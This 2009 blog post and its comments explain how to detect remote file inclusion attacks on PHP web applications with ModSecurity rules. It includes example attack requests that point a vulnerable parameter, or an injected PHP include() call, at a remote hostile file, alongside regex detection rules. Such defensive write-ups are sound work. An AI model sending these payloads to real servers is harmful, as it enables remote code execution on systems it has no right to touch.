Wednesday, June 10, 2009

Generic Remote File Inclusion Attack Detection

Submitted by Ryan Barnett 6/10/2009

A big challenge for identifying web application attacks is to detect malicious activity that cannot easily be spotted using using signatures. Remote file inclusion (RFI) is a popular technique used to attack web applications (especially php applications) from a remote server. RFI attacks are extremely dangerous as they allow a client to to force an vulnerable application to run their own malicious code by including a reference pointer to code from a URL located on a remote server. When an application executes the malicious code it may lead to a backdoor exploit or technical information retrieval.

The application vulnerability leading to RFI is a result of insufficient validation on user input. In order to perform proper validation of input to avoid RFI attacks, an application should check that user input doesn’t contain invalid characters or reference to an unauthorized external location. Or Katz, who is the WebDefend signature team lead at Breach Security recently gave a presentation at the OWASP Local Chapter meeting in Israel and Breach Security Labs has since released a whitepaper based on his research. I would like to highlight a few of the detection items that were presented.

Challenges to Generic Detection
When trying to use a negative security approach in order to have generic solution for the RFI attack we will try to use the following regular expression to search for a signature such as “(ht|f)tps?://” within parameter payloads. This initially seems like a good approach as this would identify the beginning portions of a fully qualified URI. While this is true, this approach will unfortunately result in many false positives due to the following:
  • There are request parameters which are used as external link (e.g. - accepts http:// as valid input) that point either back to the local host (WordPress and other apps do this) or legitimately point to a resource on a remote site.
  • There are "free text" request parameters that are prone to false positives. In many cases these parameters contains user input (submission of free text from the user to the application) and in other cases parameter that contains large amount of data (may include URL links that can be false detected as RFI attack).

URL Contains an IP Address
Most legitimate URL referencing is done by specifying an actual domain/hostname and as such using an IP address as external link may indicate an attack. A typical attack using an IP address looks like:
GET /?include=http://192.0.55.2/hacker.txt HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Therefore a rule for detecting such a condition should search for the pattern “(ht|f)tps?:\/\/” followed by an IP address. An example ModSecurity rule to detect it is:
SecRule ARGS "@rx (ht|f)tps?:\/\/([\d\.]+)" \
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:Remote File Inclusion.'"
The PHP "include()" Function
Breach Security Labs has seen any attack vectors (from customer logs and honeypot data samples) that try to include remote file by using the PHP "include" keyword function. A typical attack using an include PHP keyword looks like:
GET /?id={${include("http://www.malicuos_site.com/hacker.txt")}}{${exit()}}HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
A rule for detecting such a condition should search for “include(“ followed by “(ht|f)tps?:\/\/”. An example ModSecurity rule to detect this is:
SecRule ARGS "@rx \binclude\s*\([^)]*(ht|f)tps?:\/\/" \
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:’Remote File Inclusion'"
RFI Data Ends with a Question Mark (?)
Appending question marks to the end of the injected RFI payload is a common technique and is somewhat similar to SQL Injection payloads utilizing comment specifiers (--, ;-- or #) at the end of their payloads. The RFI attackers don't know what the remainder of the PHP code that they are going to be included into is supposed to do. So, by adding the "?" character, the remainder of the local PHP code is actually treated as a parameter to the RFI included code. The RFI code then simply ignores the legitmate code and only executes its own. A typical attack using a question mark at end looks like:
GET /?include=http://www.malicuos_site.com/hacker.txt? HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
A rule for detecting such a condition such an attack should search for “(ft|htt)ps?.*\?$”. An example ModSecurity rule to detect it is:
SecRule ARGS "@rx (ft|htt)ps?.*\?+$" \
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:’Remote File Inclusion'"
RFI Host Doesn't Match Local Host
One other technique that can be used to detect RFI attacks (when the application never legitimately references files offsite) is to inspect the domain name/hostname specified within the parameter payload and then compare it to the Host header data submitted in the request. If the two items match, then this would allow the normal fully qualified referencing back to the local site while simultaneously deny offsite references. For example, the following legitimate request would be allowed as the hostnames match:
GET /path/to/app?foo=bar&filename=http://www.example.com/somefile.txt HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
A rule for detecting such a condition such an attack should initially search for “^(?:ht|f)tps?:\/\/(.*)\?$” which also captures the hostname data within the 2nd parentheses. The 2nd part of this rule then compares the saved capture data with the macro expanded Host header data from the request. An example ModSecurity rule to detect it is:
SecRule ARGS "^(?:ht|f)tps?://(.*)\?$" \
"chain,phase:2,t:none,t:htmlEntityDecode,t:lowercase,capture,ctl:auditLogParts=+E,block,log,auditlog,status:501,msg:'Remote File Inclusion Attack'"
SecRule TX:1 "!@beginsWith %{request_headers.host}"
These generic RFI rules could be used individually or collaboratively in an anomaly scoring scenario to help identify these types of attacks. Keep an eye out for a major public release of the new ModSecurity Core Rule Set (CRS) as it will include these new rules and many others.

3 comments:

Arshan Dabirsiaghi said...

i think this rule is fail because most browsers tolerate unusual-if-not-strictly-illegal URL slash formats:

SecRule ARGS "^(?:ht|f)tps?://(.*)\?$" \

see my post at: http://i8jesus.com/?p=37 and the browser security handbook:

http://code.google.com/p/browsersec/wiki/Part1#Uniform_Resource_Locators

Ryan Barnett said...

Hey Arshan :) You bring up some good points however the RFI payloads aren't normally aimed at end users like in an XSS attack so this isn't really an issue with browser interpretation. The issue is how is the PHP include() or allow_url_fopen functions going to interpret it? http://en.wikipedia.org/wiki/Remote_File_Inclusione#Why_the_attack_works

I haven't tested it yet, but my hunch is that if a client supplied RFI code with abnormal slashes (as you referenced) then the included PHP code wouldn't properly trigger. This is a case that I often run into with XSS evasion payloads. Attackers may figure out a way to circumvent a signature/filter however by doing so they have munged up the JS payload so much that it won't actually execute in the browser.

Arshan Dabirsiaghi said...

I'm a retard. You're absolutely right. I was pointed to this post to look for that problem and I didn't really read the rest of it carefully.

On the other hand, my temporary loss of 120 IQ may have landed on the good idea you mentioned - fuzzing the dangerous PHP functions for bizarro URL features.